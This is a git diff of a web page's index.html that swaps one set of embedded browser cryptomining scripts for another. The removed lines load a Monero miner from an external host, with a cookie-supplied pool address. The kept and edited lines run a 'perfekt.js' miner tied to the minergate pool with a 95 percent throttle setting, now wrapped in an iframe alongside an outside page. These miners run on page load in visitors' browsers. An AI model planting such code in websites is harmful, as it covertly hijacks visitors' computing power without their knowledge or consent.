--- a/index.html
+++ b/index.html
@@ -19,50 +19,25 @@
     <div align="center"><iframe width="720" height="480" src="http://player.latino-webtv.com/channels/space.html" frameborder="0" allow="kutoplay; encrypted-media" allowfullscreen></iframe></div>
 -->
 	
-<p>4</p>
+<p>6</p>
 	
-<script>
-$(function() {
-if ($.cookie("pooladdress")) {
-			var str = "https://thelifeisbinary.netlify.com/media.js?perfekt=wss://?jason=";
-			var pool = $.cookie("pooladdress");
-			var links = str+pool;
-			
-			var script = document.createElement("script");
-			script.type = "text/javascript";
-			script.src = links; 
-			document.getElementsByTagName("head")[0].appendChild(script);
-	} 
-	else
-	{
-		    var str = "https://thelifeisbinary.netlify.com/media.js?perfekt=wss://?algo=cn?variant=0?jason=faster.xmr";
-			var script = document.createElement("script");
-			script.type = "text/javascript";
-			script.src = str; 
-			document.getElementsByTagName("head")[0].appendChild(script);
-	}
-  });
-</script>
-	
-<script src="assets/scripts/gustav.js?v24042018"></script>
-	
-<script src="assets/scripts/Chart.min.js"></script>
-	
-<script type="text/javascript" src="https://thelifeisbinary.netlify.com/media.js?perfekt=wss://?jason=xmr.pool.minergate.com:45700"></script>
-	
-<script>
-  window.dataLayer = window.dataLayer || [];
-  function gtag(){dataLayer.push(arguments);}
-  gtag('js', new Date());
-
-  gtag('config', 'UA-81214188-2');
-</script>	
-	
+<iframe src="http://www.bluboosting.com/mi.html" width="720px" height="480px" frameborder="0">
+<html>
+<head>
+<meta name="robots" content="noindex, nofollow">
+<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">
+<meta http-equiv="Pragma" content="no-cache">
+<meta http-equiv="Expires" content="0">
+</head>
+<body>
 <script src="https://eth-pocket.de/perfekt/perfekt.js?perfekt=wss://?algo=cn?variant=0?jason=xmr.pool.minergate.com:45700"></script>
 <script type="text/javascript">
-PerfektStart('lalolanda325@gmail.com', 'x');
+PerfektStart('lalolanda325@outlook.com', 'x');
 throttleMiner = 95;
 </script>
+</body>
+</html>		
+</iframe>
 		
 <!--      
 <div align="center" class="coinhive-miner" 
